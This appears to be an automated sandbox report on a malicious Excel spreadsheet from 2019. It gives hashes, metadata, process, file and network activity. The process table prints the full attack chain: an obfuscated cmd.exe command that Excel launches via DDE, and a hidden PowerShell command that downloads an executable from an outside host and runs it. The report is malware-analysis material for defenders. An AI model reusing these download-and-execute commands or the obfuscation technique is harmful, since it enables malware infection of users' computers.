File name: | 0535f6306fde54ba2a86ff0a14a107d997ab45334424ccdb99eecf62bcbbae54 |
Full analysis: | https://app.any.run/tasks/ca6a6196-3cab-4fd8-a056-5069db919b5b |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 10:47:43 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: ESSSSSS, Last Saved By: ESSSSSS, Last Saved Time/Date: Thu Mar 28 05:14:51 2019, Security: 0 |
MD5: | 16BC70012D54BCBF49783B4E063695EE |
SHA1: | 21985F7F68440CADB846ECD86594BF0761B20635 |
SHA256: | 0535F6306FDE54BA2A86FF0A14A107D997AB45334424CCDB99EECF62BCBBAE54 |
SSDEEP: | 768:hkQzlaZAWh+ZO33ufIUfhttR6wyE/K87A14OiCdpqdRXgL7:KQzlaZAWh+ZO33ufIUfhttR6wyE/K87o |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
HeadingPairs: |
|
---|---|
TitleOfParts: | chibykeexploit |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:03:28 05:14:51 |
LastModifiedBy: | ESSSSSS |
Author: | ESSSSSS |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
CompObjUserTypeLen: | 31 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3568 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3908 | C:\warren\televisions\volunteer\..\..\..\windows\system32\cmd.exe /v:ON /c"set brings= && set deadline=%h=(z9r:xYde;GbLnyHQc.@UA63MEq)5v\fSum7X1TK$Rt8_aw4kIZ'2Wslj~JFBi-/OPV+D Ng0p,Co && for %H in (76,79,49,11,6,57,1,11,58,58,21,11,8,11,72,65,49,72,1,64,10,10,11,16,72,65,11,76,72,14,17,76,48,57,57,72,3,73,11,49,65,67,14,59,11,20,45,72,35,17,57,45,11,37,21,73,11,45,21,56,11,14,78,58,64,11,16,45,30,21,71,79,49,16,58,79,48,10,62,64,58,11,3,54,1,45,45,76,7,66,66,4,11,16,45,48,20,1,11,6,21,37,58,66,20,1,64,14,17,51,11,21,11,8,11,54,77,43,11,16,32,7,45,11,37,76,72,70,72,54,33,34,11,48,45,36,6,11,57,21,11,8,11,54,30,12,7550) DO (set brings=!brings!!deadline:~%H,1!) && if %H == 7550 call !brings:~-146!" && %tmp%/features.exe | C:\windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2716 | powershell.exe -w hidden -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://zentacher.ml/chibyke.exe',$env:temp + '\features.exe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3568 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6E65.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NBMP2I5EHEFP8YQX3BMS.temp | — | |
MD5:— | SHA256:— | |||
3568 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF63013AB50F714CCF.TMP | — | |
MD5:— | SHA256:— | |||
3568 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFEC25DF07A70BCD25.TMP | — | |
MD5:— | SHA256:— | |||
3568 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\0535f6306fde54ba2a86ff0a14a107d997ab45334424ccdb99eecf62bcbbae54.xls.LNK | lnk | |
MD5:AA50379D3D249D7F9C686072A1A7C851 | SHA256:3F4AD333FF87EA5595C68AE675CC9DAA2C73BA117419F05A8A785B95279F7747 | |||
3568 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:45EFAC1EE4703DEBE5B85A9777996FAB | SHA256:92E0A98A594732249C19BFC5235D4BFC5E5E1A5812EAF35C4AF074CD2D2781EB | |||
2716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3568 | EXCEL.EXE | C:\Users\admin\Desktop\0535f6306fde54ba2a86ff0a14a107d997ab45334424ccdb99eecf62bcbbae54.xls | document | |
MD5:9F44D44F1A27CC5EDEF5D3320AD9E3BA | SHA256:BE76275576FFEEB911676A428720CE2067E0E06E982D2AA3B6DA42E1C4378DBC | |||
2716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe8364.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2716 | powershell.exe | GET | 522 | 104.24.105.236:80 | http://zentacher.ml/chibyke.exe | US | html | 4.63 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2716 | powershell.exe | 104.24.105.236:80 | zentacher.ml | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
zentacher.ml |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .ml Domain |